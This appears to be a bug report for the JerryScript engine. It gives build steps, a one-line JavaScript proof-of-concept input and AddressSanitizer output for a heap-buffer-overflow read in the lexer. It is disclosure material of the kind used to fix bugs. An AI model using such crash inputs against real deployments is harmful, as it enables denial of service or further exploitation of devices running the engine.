Description
JerryScript revision
Commit: c509a06
Version: v3.0.0
Build platform
Ubuntu 24.04.1 LTS (Linux 6.8.0-49-generic x86_64)
Build steps
python3 ./tools/build.py --builddir=build_normal --clean --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --stack-limit=20
Test case
// poc.js
import{a as``,𝖊,d as"\D"
Execution steps
./jerry poc.js
Output
=================================================================
==101978==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x504000000036 at pc 0x7eed850c9eaa bp 0x7ffd367f1020 sp 0x7ffd367f07c8
READ of size 104 at 0x504000000036 thread T0
#0 0x7eed850c9ea9 in MemcmpInterceptorCommon(void*, int (*)(void const*, void const*, unsigned long), void const*, void const*, unsigned long) ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:813
#1 0x7eed850ca37a in memcmp ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:845
#2 0x7eed850ca37a in memcmp ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:840
#3 0x59f5b5dcc5c0 in lexer_construct_literal_object /jerryscript/jerry-core/parser/js/js-lexer.c:2420
#4 0x59f5b5d7fc99 in scanner_check_variables /jerryscript/jerry-core/parser/js/js-scanner-util.c:2279
#5 0x59f5b5d7996f in parser_parse_source /jerryscript/jerry-core/parser/js/js-parser.c:2274
#6 0x59f5b5d1f42b in jerry_parse_common /jerryscript/jerry-core/api/jerryscript.c:418
#7 0x59f5b5d1f642 in jerry_parse /jerryscript/jerry-core/api/jerryscript.c:486
#8 0x59f5b5de8a46 in jerryx_source_parse_script /jerryscript/jerry-ext/util/sources.c:52
#9 0x59f5b5de8ae2 in jerryx_source_exec_script /jerryscript/jerry-ext/util/sources.c:63
#10 0x59f5b5d19d90 in main /jerryscript/jerry-main/main-desktop.c:156
#11 0x7eed84c2a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#12 0x7eed84c2a28a in __libc_start_main_impl ../csu/libc-start.c:360
#13 0x59f5b5d1c244 in _start (/jerryscript/build_normal/bin/jerry+0x2a244) (BuildId: 3d6b06d6d31662bc580b73f5542d8d3069a1e936)
0x504000000036 is located 0 bytes after 38-byte region [0x504000000010,0x504000000036)
allocated by thread T0 here:
#0 0x7eed850fd9c7 in malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:69
#1 0x59f5b5de9388 in jerry_port_source_read /jerryscript/jerry-port/common/jerry-port-fs.c:72
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:813 in MemcmpInterceptorCommon(void*, int (*)(void const*, void const*, unsigned long), void const*, void const*, unsigned long)
Shadow bytes around the buggy address:
0x503ffffffd80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x503ffffffe00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x503ffffffe80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x503fffffff00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x503fffffff80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x504000000000: fa fa 00 00 00 00[06]fa fa fa fa fa fa fa fa fa
0x504000000080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x504000000100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x504000000180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x504000000200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x504000000280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==101978==ABORTING